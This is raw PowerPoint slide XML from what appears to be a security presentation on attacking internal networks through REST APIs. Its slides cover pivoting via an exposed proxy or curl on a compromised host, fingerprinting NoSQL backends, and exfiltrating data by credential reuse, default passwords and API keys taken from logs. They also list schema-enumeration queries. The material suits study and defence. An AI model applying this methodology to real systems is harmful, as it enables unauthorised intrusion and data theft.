          <a:xfrm>
            <a:off x="7620000" y="4623436"/>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85" name="Flowchart: Terminator 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="5897499"/>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X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="TextBox 85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="5867400"/>
            <a:ext cx="2791918" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Non-compromised machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Flowchart: Terminator 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256082" y="6290167"/>
            <a:ext cx="914400" cy="301752"/>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Y</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="TextBox 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1246682" y="6260068"/>
            <a:ext cx="3205108" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compromised/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pwned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300145551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63000" cy="715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Attacking An Internal Network (REST style)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="838201"/>
            <a:ext cx="3962400" cy="5211698"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Find an HTTP proxy in the publically exposed Application/REST API or get access to curl on a compromised system in the internal network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Figure out which systems are running on the internal network and target a data rich server.  (Port Scanning and Fingerprinting is easier because the REST protocol is self describing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> data from the REST interface of the backend system and pass the correct parameters by sniffing the network, reusing credentials, using default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>userids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> and passwords, bypassing authentication, reading server logs to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>apiKeys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Flowchart: Terminator 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4151375" y="4078223"/>
            <a:ext cx="1600201" cy="301752"/>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SAP REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102352" y="3886197"/>
            <a:ext cx="381000" cy="1"/>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35" name="Flowchart: Terminator 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5180076" y="3735324"/>
            <a:ext cx="914400" cy="301752"/>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SAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Flowchart: Terminator 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4494276" y="5640323"/>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AS5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102352" y="5791197"/>
            <a:ext cx="381000" cy="1"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Flowchart: Terminator 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5180076" y="5640324"/>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t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Flowchart: Terminator 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4132326" y="1925574"/>
            <a:ext cx="16383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Pub REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="71" name="Straight Arrow Connector 70"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102352" y="1523998"/>
            <a:ext cx="381000" cy="1"/>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72" name="Flowchart: Terminator 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5180076" y="13731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Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Can 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7841381" y="2057400"/>
            <a:ext cx="914400" cy="548640"/>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Mongo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Can 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="2971800"/>
            <a:ext cx="914400" cy="548640"/>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Couch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Can 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="1143000"/>
            <a:ext cx="914400" cy="548640"/>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Neo4j</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Can 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7841381" y="3947160"/>
            <a:ext cx="914400" cy="548640"/>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Cassan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Can 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7841381" y="4876800"/>
            <a:ext cx="914400" cy="548640"/>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HBase</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="83" name="Straight Arrow Connector 82"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="42" idx="1"/>
            <a:endCxn id="33" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4951476" y="2895600"/>
            <a:ext cx="0" cy="53339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sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Can 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="5852160"/>
            <a:ext cx="914400" cy="548640"/>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Flowchart: Terminator 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="6049899"/>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X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="6019800"/>
            <a:ext cx="2791918" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Non-compromised machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Flowchart: Terminator 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="6442567"/>
            <a:ext cx="914400" cy="301752"/>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Y</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="TextBox 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="6412468"/>
            <a:ext cx="1833259" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Affected machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="42" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4011118" y="2076450"/>
            <a:ext cx="789482"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48" name="Flowchart: Terminator 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6780087" y="1220913"/>
            <a:ext cx="762000" cy="453771"/>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REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Flowchart: Terminator 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6783745" y="2138973"/>
            <a:ext cx="754682" cy="453771"/>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REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Flowchart: Terminator 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6783745" y="3046056"/>
            <a:ext cx="754682" cy="453771"/>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REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Flowchart: Terminator 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6783745" y="3960456"/>
            <a:ext cx="754682" cy="453771"/>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REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Flowchart: Terminator 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6783745" y="4882173"/>
            <a:ext cx="754682" cy="453771"/>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REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Flowchart: Terminator 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6783745" y="5948973"/>
            <a:ext cx="754682" cy="453771"/>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REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Straight Arrow Connector 53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="42" idx="2"/>
            <a:endCxn id="48" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5102352" y="1447799"/>
            <a:ext cx="1831850" cy="628651"/>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55" name="Straight Arrow Connector 54"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="48" idx="2"/>
            <a:endCxn id="78" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7387973" y="1417320"/>
            <a:ext cx="460627" cy="3047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56" name="Straight Arrow Connector 55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="42" idx="2"/>
            <a:endCxn id="49" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102352" y="2076450"/>
            <a:ext cx="1831849" cy="28940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59" name="Straight Arrow Connector 58"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="42" idx="2"/>
            <a:endCxn id="50" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102352" y="2076450"/>
            <a:ext cx="1831849" cy="1196492"/>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62" name="Straight Arrow Connector 61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="42" idx="2"/>
            <a:endCxn id="51" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102352" y="2076450"/>
            <a:ext cx="1831849" cy="2110892"/>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65" name="Straight Arrow Connector 64"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="42" idx="2"/>
            <a:endCxn id="52" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102352" y="2076450"/>
            <a:ext cx="1831849" cy="303260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68" name="Straight Arrow Connector 67"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="42" idx="2"/>
            <a:endCxn id="53" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102352" y="2076450"/>
            <a:ext cx="1831849" cy="409940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85" name="Straight Arrow Connector 84"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7391400" y="2331721"/>
            <a:ext cx="460627" cy="3047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86" name="Straight Arrow Connector 85"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7391400" y="3276600"/>
            <a:ext cx="460627" cy="3047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87" name="Straight Arrow Connector 86"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7387973" y="4236721"/>
            <a:ext cx="460627" cy="3047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88" name="Straight Arrow Connector 87"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7391400" y="5151121"/>
            <a:ext cx="460627" cy="3047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89" name="Straight Arrow Connector 88"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7387973" y="6172200"/>
            <a:ext cx="460627" cy="3047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75787245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is Self Describing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What URL would you first try when gathering information about a REST API and the system that backs it?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382858847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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>REST is Self Describing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What URL would you first try when gathering information about a REST API and the system that backs it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://host:port/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compare this to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>all_tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   (in Oracle)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sp_msforeachdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 'select "?" AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, * from [?].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sys.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    (SQL Server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT DISTINCT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME IN ('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>columnA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ColumnB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>') AND TABLE_SCHEMA='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>YourDatabase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>';    (My SQL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23533472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Especially for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NoSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> REST APIs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All of the following DBs have REST APIs which closely follow their database object structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HBase</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Couch DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mongo DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cassandra.io</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Neo4j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255549617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err="1" smtClean="0"/>
              <a:t>HBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find the running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> version:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://host:9000/version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
